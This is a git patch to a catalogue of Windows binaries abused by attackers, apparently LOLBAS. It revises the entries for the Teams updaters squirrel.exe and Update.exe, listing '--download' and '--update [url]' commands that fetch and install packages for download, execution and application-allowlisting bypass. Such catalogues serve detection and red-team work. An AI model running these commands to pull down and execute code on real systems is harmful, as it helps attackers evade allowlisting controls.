From e05ae6c051cf75b89c3de1461a074d46032f7d36 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Fri, 28 Jun 2019 09:05:27 +0200 Subject: [PATCH] Adjusted Update and Squirrel --- yml/OtherMSBinaries/squirrel.yml | 16 ++++++++-------- yml/OtherMSBinaries/update.yml | 14 +++++++------- 2 files changed, 15 insertions(+), 15 deletions(-) diff --git a/yml/OtherMSBinaries/squirrel.yml b/yml/OtherMSBinaries/squirrel.yml index 8ee7ce0..ff1ae90 100644 --- a/yml/OtherMSBinaries/squirrel.yml +++ b/yml/OtherMSBinaries/squirrel.yml @@ -6,24 +6,24 @@ Created: '2019-06-26' Commands: - Command: squirrel.exe --download [url to package] Description: The above binary will go to url and look for RELEASES file and download the nuget package. - Usecase: Download and execute binary - Category: Execute + Usecase: Download binary + Category: Download Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: squirrel.exe --download [url to package] - Description: The above binary will go to url and look for RELEASES file and download the nuget package. + - Command: squirrel.exe --update [url to package] + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ - OperatingSystem: Windows 10 - - Command: squirrel.exe --download [url to package] - Description: The above binary will go to url and look for RELEASES file and download the nuget package. + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: squirrel.exe --update [url to package] + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary - Category: Download + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ diff --git a/yml/OtherMSBinaries/update.yml b/yml/OtherMSBinaries/update.yml index 53ac526..33c30b8 100644 --- a/yml/OtherMSBinaries/update.yml +++ b/yml/OtherMSBinaries/update.yml @@ -6,24 +6,24 @@ Created: '2019-06-26' Commands: - Command: Update.exe --download [url to package] Description: The above binary will go to url and look for RELEASES file and download the nuget package. - Usecase: Download and execute binary - Category: Execute + Usecase: Download binary + Category: Download Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --download [url to package] - Description: The above binary will go to url and look for RELEASES file and download the nuget package. + - Command: Update.exe --update [url to package] + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --download [url to package] - Description: The above binary will go to url and look for RELEASES file and download the nuget package. + - Command: Update.exe --update [url to package] + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary - Category: Download + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/